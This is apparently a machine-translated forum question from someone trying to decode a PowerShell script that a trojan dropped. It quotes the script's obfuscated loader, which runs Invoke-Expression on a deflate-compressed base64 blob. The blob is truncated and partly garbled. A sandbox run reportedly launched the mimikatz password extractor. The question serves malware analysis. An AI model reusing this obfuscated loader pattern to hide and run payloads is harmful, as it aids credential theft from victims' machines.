我发现特洛伊木马删除了一个powershell脚本,我对powershell不熟悉。因此,我很想知道它的内部结构,但脚本已编码,因此无法通过基本的base64解码方法进行解码。
我尝试了以下解决方案:
Decoding base64 with powershell。
和开发人员的base64decoder应用程序,该应用程序带有encode.dec文件,但同样失败,并指出某些内容不是base64字符。
调用表达式$(New-Object IO.StreamReader($(New-Object IO.Compression.DeflateStream($(New-Object IO.MemoryStream(,$([Convert] :: FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgYykkQ1Q1Z1Q1Q1C1Z1Q1Q1Q1Q1Q1Q1Q1Q1E0E0K1E0E0K1E0K1E1E0E0E0E0E0K1E1E) >
...以后499个单词页面...
V6CuHdj + nTu / cfL / AA ==')))))),[IO.Compression.CompressionMode] :: Decompress)),[Text.Encoding] :: ASCII))。ReadToEnd();
我不确定输出应该是什么,因为我对Powershell脚本没有经验。我已经在沙箱网站上通过app.any.run的名称运行了该脚本,它打开了“ mimikatz”密码提取器。